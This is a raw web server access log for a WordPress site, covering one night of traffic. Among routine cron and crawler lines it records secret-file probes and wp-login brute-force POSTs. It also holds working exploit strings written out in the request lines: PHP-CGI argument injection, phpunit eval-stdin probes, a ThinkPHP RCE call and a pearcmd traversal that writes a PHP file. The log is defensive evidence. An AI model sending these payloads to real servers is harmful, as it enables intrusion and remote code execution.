195.211.188.185 - - [28/Sep/2025:03:58:14 +0800] "GET /application/config/constants.php/ HTTP/1.1" 404 8991 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:14 +0800] "GET /sftp.json HTTP/1.1" 404 8991 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:14 +0800] "GET /prevlaravel/sftp-config.json HTTP/1.1" 404 8991 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:14 +0800] "GET /private/env.json HTTP/1.1" 404 8991 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:14 +0800] "GET /.wp-config.php.swp HTTP/1.1" 404 8991 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:14 +0800] "GET /appsettings.Test.json HTTP/1.1" 404 8991 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:14 +0800] "GET /phpinfo.php3 HTTP/1.1" 404 8991 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:14 +0800] "GET /config.json HTTP/1.1" 404 8991 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:14 +0800] "GET /config/production.json HTTP/1.1" 404 8991 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:14 +0800] "GET /api/config/tsconfig.json HTTP/1.1" 200 81 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:14 +0800] "GET /appsettings.json HTTP/1.1" 404 8991 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:14 +0800] "GET /.vscode/sftp.json HTTP/1.1" 404 8991 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:14 +0800] "GET /appsettings.Production.json HTTP/1.1" 404 8991 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:14 +0800] "GET /manifest.json HTTP/1.1" 404 8991 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:14 +0800] "GET /.vscode/settings.json HTTP/1.1" 404 8991 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:14 +0800] "GET /bundleconfig.json HTTP/1.1" 404 8991 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:14 +0800] "GET /config/default.json HTTP/1.1" 404 8991 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:14 +0800] "GET /.env.development.local HTTP/1.1" 404 8991 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:14 +0800] "GET /settings.json HTTP/1.1" 404 8991 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:14 +0800] "GET /.env.sample HTTP/1.1" 404 8991 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:14 +0800] "GET /config/daemon.json HTTP/1.1" 404 8991 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:14 +0800] "GET /_profiler/phpinfo HTTP/1.1" 404 8991 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:14 +0800] "GET /appsettings.Development.json HTTP/1.1" 404 8991 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:14 +0800] "GET /angular.json HTTP/1.1" 404 8991 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:14 +0800] "GET /?phpinfo=1 HTTP/1.1" 200 33467 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:15 +0800] "GET /phpinfo HTTP/1.1" 404 8990 "http://cqqizhou.com/index.php/phpinfo" "Go-http-client/1.1"
36.133.115.36 - - [28/Sep/2025:04:00:59 +0800] "POST /wp-cron.php?doing_wp_cron=1759003259.6633570194244384765625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.229.65.46 - - [28/Sep/2025:04:00:59 +0800] "POST /wp-login.php HTTP/1.1" 200 2889 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13.3; rv:126.0) Gecko/20100101 Firefox/126.0"
36.133.115.36 - - [28/Sep/2025:04:04:14 +0800] "POST /wp-cron.php?doing_wp_cron=1759003454.1282479763031005859375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
89.46.109.92 - - [28/Sep/2025:04:04:14 +0800] "POST /wp-login.php HTTP/1.1" 200 2971 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15"
36.133.115.36 - - [28/Sep/2025:04:07:23 +0800] "POST /wp-cron.php?doing_wp_cron=1759003643.7019140720367431640625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
13.50.0.57 - - [28/Sep/2025:04:07:23 +0800] "POST /wp-login.php HTTP/1.1" 200 2978 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
36.133.115.36 - - [28/Sep/2025:04:13:41 +0800] "POST /wp-cron.php?doing_wp_cron=1759004021.7945859432220458984375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
206.189.80.76 - - [28/Sep/2025:04:13:41 +0800] "POST /wp-login.php HTTP/1.1" 200 2974 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36"
36.133.115.36 - - [28/Sep/2025:04:16:52 +0800] "POST /wp-cron.php?doing_wp_cron=1759004212.1555709838867187500000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
81.88.53.139 - - [28/Sep/2025:04:16:52 +0800] "POST /wp-login.php HTTP/1.1" 200 2976 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36"
36.133.115.36 - - [28/Sep/2025:04:23:16 +0800] "POST /wp-cron.php?doing_wp_cron=1759004596.1456139087677001953125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
40.160.6.206 - - [28/Sep/2025:04:23:16 +0800] "POST /wp-login.php HTTP/1.1" 200 2970 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0"
36.133.115.36 - - [28/Sep/2025:04:26:28 +0800] "POST /wp-cron.php?doing_wp_cron=1759004788.0881309509277343750000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
68.183.135.252 - - [28/Sep/2025:04:26:28 +0800] "POST /wp-login.php HTTP/1.1" 200 2889 "http://cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15"
36.133.115.36 - - [28/Sep/2025:04:32:52 +0800] "POST /wp-cron.php?doing_wp_cron=1759005172.4680600166320800781250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
178.128.166.101 - - [28/Sep/2025:04:32:52 +0800] "POST /wp-login.php HTTP/1.1" 200 2889 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0"
36.133.115.36 - - [28/Sep/2025:04:47:16 +0800] "POST /wp-cron.php?doing_wp_cron=1759006036.9003798961639404296875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.6 - - [28/Sep/2025:04:47:17 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [28/Sep/2025:04:50:51 +0800] "POST /wp-cron.php?doing_wp_cron=1759006251.4962010383605957031250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.70 - - [28/Sep/2025:04:50:51 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [28/Sep/2025:05:06:47 +0800] "POST /wp-cron.php?doing_wp_cron=1759007207.1285328865051269531250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
111.7.96.148 - - [28/Sep/2025:05:06:47 +0800] "GET / HTTP/1.1" 200 41369 "-" "curl/7.64.1"
123.160.223.75 - - [28/Sep/2025:05:06:50 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
123.160.223.74 - - [28/Sep/2025:05:06:50 +0800] "GET / HTTP/1.1" 200 39369 "http://36.133.115.36" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
123.160.223.73 - - [28/Sep/2025:05:06:55 +0800] "GET / HTTP/1.1" 200 39369 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
123.160.223.72 - - [28/Sep/2025:05:06:56 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
123.160.223.73 - - [28/Sep/2025:05:06:56 +0800] "GET / HTTP/1.1" 200 39369 "http://www.cqqizhou.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
36.133.115.36 - - [28/Sep/2025:05:33:58 +0800] "POST /wp-cron.php?doing_wp_cron=1759008838.4079029560089111328125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
36.133.108.119 - - [28/Sep/2025:05:33:58 +0800] "HEAD /xmlrpc.php HTTP/1.1" 405 0 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; zh-cn) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5"
36.133.115.36 - - [28/Sep/2025:05:47:50 +0800] "POST /wp-cron.php?doing_wp_cron=1759009670.6721808910369873046875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
195.18.19.237 - - [28/Sep/2025:05:47:51 +0800] "GET / HTTP/1.1" 200 151919 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
36.133.115.36 - - [28/Sep/2025:05:54:17 +0800] "POST /wp-cron.php?doing_wp_cron=1759010057.7746620178222656250000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.6 - - [28/Sep/2025:05:54:18 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [28/Sep/2025:05:59:08 +0800] "POST /wp-cron.php?doing_wp_cron=1759010348.4366788864135742187500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
37.60.141.156 - - [28/Sep/2025:05:59:08 +0800] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 301 5 "-" "-"
37.60.141.156 - - [28/Sep/2025:05:59:09 +0800] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 31381 "http://36.133.115.36:80/cgi-bin/luci/;stok=/locale" "-"
36.133.115.36 - - [28/Sep/2025:06:10:35 +0800] "POST /wp-cron.php?doing_wp_cron=1759011035.2024490833282470703125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
176.65.132.156 - - [28/Sep/2025:06:10:35 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [28/Sep/2025:06:35:56 +0800] "POST /wp-cron.php?doing_wp_cron=1759012556.7950139045715332031250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
85.208.96.206 - - [28/Sep/2025:06:35:56 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
36.133.115.36 - - [28/Sep/2025:06:52:50 +0800] "POST /wp-cron.php?doing_wp_cron=1759013570.7607250213623046875000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
147.182.241.88 - - [28/Sep/2025:06:52:50 +0800] "GET /.env HTTP/1.1" 404 8989 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
147.182.241.88 - - [28/Sep/2025:06:52:51 +0800] "GET /.git/config HTTP/1.1" 404 8990 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
36.133.115.36 - - [28/Sep/2025:06:56:10 +0800] "POST /wp-cron.php?doing_wp_cron=1759013770.2724590301513671875000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.6 - - [28/Sep/2025:06:56:10 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [28/Sep/2025:07:05:35 +0800] "POST /wp-cron.php?doing_wp_cron=1759014335.6200730800628662109375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
37.60.141.156 - - [28/Sep/2025:07:05:36 +0800] "GET / HTTP/1.1" 200 151919 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
36.133.115.36 - - [28/Sep/2025:07:30:19 +0800] "POST /wp-cron.php?doing_wp_cron=1759015819.5210700035095214843750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
176.65.149.245 - - [28/Sep/2025:07:30:19 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [28/Sep/2025:07:35:29 +0800] "POST /wp-cron.php?doing_wp_cron=1759016129.8056719303131103515625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
182.42.111.213 - - [28/Sep/2025:07:35:30 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [28/Sep/2025:07:49:19 +0800] "POST /wp-cron.php?doing_wp_cron=1759016959.4485650062561035156250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
103.163.246.10 - - [28/Sep/2025:07:49:19 +0800] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 31381 "-" "libredtail-http"
103.163.246.10 - - [28/Sep/2025:07:49:22 +0800] "POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 200 151919 "-" "libredtail-http"
103.163.246.10 - - [28/Sep/2025:07:49:23 +0800] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.163.246.10 - - [28/Sep/2025:07:49:24 +0800] "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.163.246.10 - - [28/Sep/2025:07:49:24 +0800] "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.163.246.10 - - [28/Sep/2025:07:49:25 +0800] "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.163.246.10 - - [28/Sep/2025:07:49:26 +0800] "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.163.246.10 - - [28/Sep/2025:07:49:26 +0800] "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.163.246.10 - - [28/Sep/2025:07:49:28 +0800] "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.163.246.10 - - [28/Sep/2025:07:49:29 +0800] "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.163.246.10 - - [28/Sep/2025:07:49:30 +0800] "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.163.246.10 - - [28/Sep/2025:07:49:31 +0800] "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.163.246.10 - - [28/Sep/2025:07:49:32 +0800] "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.163.246.10 - - [28/Sep/2025:07:49:32 +0800] "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.163.246.10 - - [28/Sep/2025:07:49:33 +0800] "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.163.246.10 - - [28/Sep/2025:07:49:35 +0800] "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.163.246.10 - - [28/Sep/2025:07:49:36 +0800] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.163.246.10 - - [28/Sep/2025:07:49:37 +0800] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.163.246.10 - - [28/Sep/2025:07:49:37 +0800] "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.163.246.10 - - [28/Sep/2025:07:49:38 +0800] "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.163.246.10 - - [28/Sep/2025:07:49:39 +0800] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.163.246.10 - - [28/Sep/2025:07:49:40 +0800] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.163.246.10 - - [28/Sep/2025:07:49:41 +0800] "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.163.246.10 - - [28/Sep/2025:07:49:41 +0800] "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.163.246.10 - - [28/Sep/2025:07:49:42 +0800] "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.163.246.10 - - [28/Sep/2025:07:49:43 +0800] "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.163.246.10 - - [28/Sep/2025:07:49:43 +0800] "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.163.246.10 - - [28/Sep/2025:07:49:44 +0800] "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.163.246.10 - - [28/Sep/2025:07:49:45 +0800] "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.163.246.10 - - [28/Sep/2025:07:49:45 +0800] "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.163.246.10 - - [28/Sep/2025:07:49:46 +0800] "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.163.246.10 - - [28/Sep/2025:07:49:47 +0800] "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.163.246.10 - - [28/Sep/2025:07:49:47 +0800] "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.163.246.10 - - [28/Sep/2025:07:49:48 +0800] "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.163.246.10 - - [28/Sep/2025:07:49:49 +0800] "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.163.246.10 - - [28/Sep/2025:07:49:50 +0800] "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.163.246.10 - - [28/Sep/2025:07:49:51 +0800] "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.163.246.10 - - [28/Sep/2025:07:49:52 +0800] "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
103.163.246.10 - - [28/Sep/2025:07:49:52 +0800] "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
36.133.115.36 - - [28/Sep/2025:07:49:54 +0800] "POST /wp-cron.php?doing_wp_cron=1759016994.0264201164245605468750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
103.163.246.10 - - [28/Sep/2025:07:49:54 +0800] "GET /index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 200 65160 "-" "libredtail-http"
103.163.246.10 - - [28/Sep/2025:07:49:56 +0800] "GET /public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 27 "-" "libredtail-http"
103.163.246.10 - - [28/Sep/2025:07:49:57 +0800] "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php HTTP/1.1" 200 151919 "-" "libredtail-http"
103.163.246.10 - - [28/Sep/2025:07:50:00 +0800] "GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1" 200 151919 "-" "libredtail-http"
103.163.246.10 - - [28/Sep/2025:07:50:02 +0800] "GET /containers/json HTTP/1.1" 301 5 "-" "libredtail-http"
103.163.246.10 - - [28/Sep/2025:07:50:04 +0800] "GET /containers/json HTTP/1.1" 301 5 "-" "libredtail-http"
36.133.115.36 - - [28/Sep/2025:07:53:09 +0800] "POST /wp-cron.php?doing_wp_cron=1759017189.3933360576629638671875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
37.60.141.158 - - [28/Sep/2025:07:53:09 +0800] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 301 5 "-" "-"
37.60.141.158 - - [28/Sep/2025:07:53:10 +0800] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 31381 "http://36.133.115.36:80/cgi-bin/luci/;stok=/locale" "-"
36.133.115.36 - - [28/Sep/2025:08:08:40 +0800] "POST /wp-cron.php?doing_wp_cron=1759018120.2796730995178222656250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.6 - - [28/Sep/2025:08:08:40 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [28/Sep/2025:08:15:15 +0800] "POST /wp-cron.php?doing_wp_cron=1759018515.6745998859405517578125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
34.234.87.131 - - [28/Sep/2025:08:15:15 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
66.249.66.201 - - [28/Sep/2025:08:15:57 +0800] "GET /material.html HTTP/1.1" 200 6459 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.7258.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
36.133.115.36 - - [28/Sep/2025:08:20:38 +0800] "POST /wp-cron.php?doing_wp_cron=1759018838.8948071002960205078125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
36.133.108.121 - - [28/Sep/2025:08:20:38 +0800] "HEAD /xmlrpc.php HTTP/1.1" 405 0 "-" "Mozilla/1.22 (compatible; MSIE 10.0; Windows 3.1)"
36.133.115.36 - - [28/Sep/2025:08:20:56 +0800] "POST /wp-cron.php?doing_wp_cron=1759018856.9116699695587158203125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
37.60.141.156 - - [28/Sep/2025:08:20:56 +0800] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 301 5 "-" "-"
37.60.141.156 - - [28/Sep/2025:08:20:58 +0800] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 31381 "http://36.133.115.36:80/cgi-bin/luci/;stok=/locale" "-"
36.133.115.36 - - [28/Sep/2025:08:35:11 +0800] "POST /wp-cron.php?doing_wp_cron=1759019711.3699769973754882812500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
176.65.149.245 - - [28/Sep/2025:08:35:11 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
14.120.48.59 - - [28/Sep/2025:08:42:36 +0800] "GET http://cqqizhou.com/ HTTP/1.1" 200 39369 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
36.133.115.36 - - [28/Sep/2025:08:42:37 +0800] "POST /wp-cron.php?doing_wp_cron=1759020157.0819339752197265625000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
36.155.101.53 - - [28/Sep/2025:08:42:37 +0800] "GET http://www.cqqizhou.com/ HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
36.155.101.53 - - [28/Sep/2025:08:42:37 +0800] "GET http://cqqizhou.com/ HTTP/1.1" 200 39369 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
14.120.48.59 - - [28/Sep/2025:08:42:40 +0800] "GET http://cqqizhou.com/contacts/ HTTP/1.1" 200 21496 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
36.155.101.53 - - [28/Sep/2025:08:42:40 +0800] "GET http://cqqizhou.com/contacts/ HTTP/1.1" 200 21496 "http://www.cqqizhou.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
36.133.115.36 - - [28/Sep/2025:08:58:54 +0800] "POST /wp-cron.php?doing_wp_cron=1759021133.9567370414733886718750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
